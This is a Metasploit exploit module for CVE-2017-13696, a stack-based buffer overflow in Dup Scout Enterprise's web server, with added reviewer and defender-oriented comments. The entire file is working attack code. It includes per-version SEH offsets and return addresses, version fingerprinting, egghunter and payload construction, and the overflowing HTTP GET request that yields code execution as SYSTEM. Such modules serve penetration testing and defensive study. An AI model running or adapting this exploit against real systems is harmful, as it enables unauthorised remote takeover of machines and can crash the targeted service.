##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for CVE-2017-13696 (see 'References'): a stack-based
# buffer overflow in the built-in web server of Dup Scout Enterprise
# <= 10.0.18, reached through an over-long request path in an HTTP GET.
# x86 only ('Arch' => ARCH_X86); control is taken via an SEH overwrite
# and an egghunter (the Seh and Egghunter mixins below).
#
# Defender-relevant facts declared in 'Notes': the service may be taken
# down (CRASH_SERVICE_DOWN) and the module declares IOC_IN_LOGS, i.e. the
# malformed GET path is expected to be visible in the target's web server
# logs. 'Privileged' => true records that the service runs as
# NT AUTHORITY\SYSTEM (per the description).
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::Egghunter
  include Msf::Exploit::Remote::HttpClient
  # Prepended so that #check runs ahead of #exploit; a target that does
  # not look vulnerable stops the run unless the operator overrides that
  # (framework behaviour of AutoCheck, not visible in this file).
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata. Each versioned target carries the distance to the
  # SEH record ('Offset') and the handler address ('Ret', documented by
  # the mona-style comment above each one). The 'Automatic' target has
  # neither and is resolved at run time by #exploit via #target_for_version.
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Dup Scout Enterprise GET Buffer Overflow',
        'Description' => %q{
          This module exploits a stack-based buffer overflow vulnerability
          in the web interface of Dup Scout Enterprise versions <= 10.0.18,
          caused by improper bounds checking of the request path in HTTP GET
          requests sent to the built-in web server which can be leveraged
          to execute arbitrary code in the context of NT AUTHORITY\SYSTEM.

          This module supports x86 versions of Dup Scout Enterprise and x86
          Windows operating systems only and has been tested successfully on
          Windows 7 SP1 (x86) and Windows XP SP0 (x86).
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'vportal', # Vulnerability discovery and PoC
          'Daniel Teixeira', # Metasploit module
          'bcoles', # Automatic targetting and additional targets
        ],
        'References' => [
          ['CVE', '2017-13696'],
          ['CWE', '121'],
          ['EDB', '42557'],
          ['EDB', '49217']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Platform' => 'win',
        'Arch' => ARCH_X86,
        # BadChars: NUL, tab, LF, CR, space and '&' — the whole buffer is
        # sent as the request URI (see #exploit), so these bytes would
        # terminate or alter the request line. Space is the room given to
        # the payload encoder.
        'Payload' => {
          'BadChars' => "\x00\x09\x0a\x0d\x20\x26",
          'Space' => 500
        },
        'Targets' => [
          # 'auto' => true is metadata only; #exploit keys on the name.
          [ 'Automatic', { 'auto' => true } ],
          [
            'Dup Scout Enterprise v8.3.16 (x86)',
            {
              'Version' => '8.3.16',
              'Offset' => 552,
              # 0x10045543 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
              'Ret' => 0x10045543
            }
          ],
          [
            'Dup Scout Enterprise v8.4.16 (x86)',
            {
              'Version' => '8.4.16',
              'Offset' => 552,
              # 0x10045c33 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
              'Ret' => 0x10045c33
            }
          ],
          [
            'Dup Scout Enterprise v9.0.28 (x86)',
            {
              'Version' => '9.0.28',
              'Offset' => 552,
              # 0x1004d983 : pop ebx # pop ecx # ret 0x20 | {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
              'Ret' => 0x1004d983
            }
          ],
          [
            'Dup Scout Enterprise v9.1.14 (x86)',
            {
              'Version' => '9.1.14',
              'Offset' => 552,
              # 0x10081b78 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
              'Ret' => 0x10081b78
            }
          ],
          [
            'Dup Scout Enterprise v9.5.14 (x86)',
            {
              'Version' => '9.5.14',
              'Offset' => 2488,
              # POP # POP # RET [libspp.dll]
              'Ret' => 0x10050ff3
            }
          ],
          [
            'Dup Scout Enterprise v9.9.14 (x86)',
            {
              'Version' => '9.9.14',
              'Offset' => 2496,
              # 0x10056c1d : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
              'Ret' => 0x10056c1d
            }
          ],
          [
            'Dup Scout Enterprise v10.0.18 (x86)',
            {
              'Version' => '10.0.18',
              'Offset' => 2496,
              # 0x10056a16 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0-
              'Ret' => 0x10056a16
            }
          ],
        ],
        'Notes' => {
          'Stability' => [ CRASH_SERVICE_DOWN ],
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ]
        },
        'Privileged' => true,
        'DisclosureDate' => '2017-03-15',
        'DefaultTarget' => 0
      )
    )
  end

  # Fingerprints the target by fetching '/' and scraping the product
  # version out of the HTML body.
  #
  # @return [Msf::Exploit::CheckCode] Unknown when no reply arrives,
  #   Safe when the product banner is absent, Detected when the version
  #   has no entry in 'Targets', Appears when a matching target exists.
  def check
    res = send_request_cgi({
      'uri' => '/',
      'method' => 'GET'
    })

    # nil means no HTTP response at all (connection-level failure).
    unless res
      return CheckCode::Unknown('Connection failed.')
    end

    # Version text sits between '>' and '<' after 'Dup Scout Enterprise v'.
    # NOTE(review): assumes res.body is a String (Rex response object);
    # an empty body simply yields no match and falls into the Safe branch.
    version = res.body.scan(/>Dup Scout Enterprise v([\d.]+)</).flatten.first

    unless version
      return CheckCode::Safe('Target is not Dup Scout Enterprise.')
    end

    # Product present but no target for this exact version string.
    unless target_for_version(version)
      return CheckCode::Detected("No targets for Dup Scout Enterprise version #{version}.")
    end

    CheckCode::Appears("Dup Scout Enterprise version #{version}.")
  end

  # Same request and regex as #check, used by #exploit for automatic
  # target selection. Unlike #check, a missing reply aborts the run
  # instead of yielding a CheckCode.
  #
  # @return [String, nil] version string such as '9.5.14', or nil when
  #   the banner is not found in the response body
  def dup_version
    res = send_request_cgi({
      'uri' => '/',
      'method' => 'GET'
    })

    # fail_with raises (Msf::Exploit::Failed), so the `return` never hands
    # a value back; it only marks the early exit.
    unless res
      return fail_with(Failure::Unreachable, 'Could not determine Dup Scout Enterprise version. No reply.')
    end

    res.body.scan(/>Dup Scout Enterprise v([\d.]+)</).flatten.first
  end

  # Looks up the first target whose 'Version' equals +version+ exactly.
  #
  # @param version [String, nil] version scraped from the banner
  # @return [Msf::Module::Target, nil] nil when +version+ is nil or no
  #   target matches. The 'Automatic' entry has no 'Version' key, so it
  #   never matches a non-nil version.
  #
  # NOTE(review): plain string equality — a banner with extra components
  # (e.g. a fourth number) would not match. `targets.find { ... }` would
  # express the same lookup without building an intermediate array.
  def target_for_version(version)
    return unless version

    targets.select { |t| version == t['Version'] }.first
  end

  # Builds the overflowing request path and sends it. The operator's
  # explicit target is used as-is; 'Automatic' is resolved through
  # #dup_version / #target_for_version and aborts with Failure::NoTarget
  # when the detected version has no entry in 'Targets'.
  def exploit
    my_target = target

    # Selection is keyed on the target *name*; the 'auto' => true flag in
    # the Automatic entry is not consulted here.
    if target.name == 'Automatic'
      print_status('Selecting a target...')
      my_target = target_for_version(dup_version)
      unless my_target
        fail_with(Failure::NoTarget, 'Unable to automatically detect a target')
      end
    end

    print_status("Using target: #{my_target.name}")

    # Egghunter options: checksum the egg and use a random 4-byte tag
    # drawn from characters outside payload_badchars.
    eggoptions = {
      checksum: true,
      eggtag: rand_text_alpha(4, payload_badchars)
    }

    # hunter is the search stub placed near the SEH record; egg is the
    # tagged, encoded payload it looks for (built by the Egghunter mixin).
    hunter, egg = generate_egghunter(
      payload.encoded,
      payload_badchars,
      eggoptions
    )

    # Request path layout, in this order: 'Offset' bytes of filler, the
    # SEH record built from the target's 'Ret', the egghunter stub, a
    # short NOP sled, the egg, then trailing filler. All generated filler
    # avoids the 'BadChars' declared in 'Payload' because the entire
    # buffer travels as the URI of the request line.
    sploit = rand_text_alpha(my_target['Offset'], payload_badchars)
    sploit << generate_seh_record(my_target.ret)
    sploit << hunter
    sploit << make_nops(10)
    sploit << egg
    sploit << rand_text_alpha(5500, payload_badchars)

    print_status("Sending payload (#{sploit.length} bytes) ...")

    # The buffer is sent as the raw request URI; the response (if any) is
    # not inspected. This is the request a defender should expect to see
    # in the web server's logs (IOC_IN_LOGS above).
    send_request_cgi({
      'method' => 'GET',
      'uri' => sploit
    })
  end
end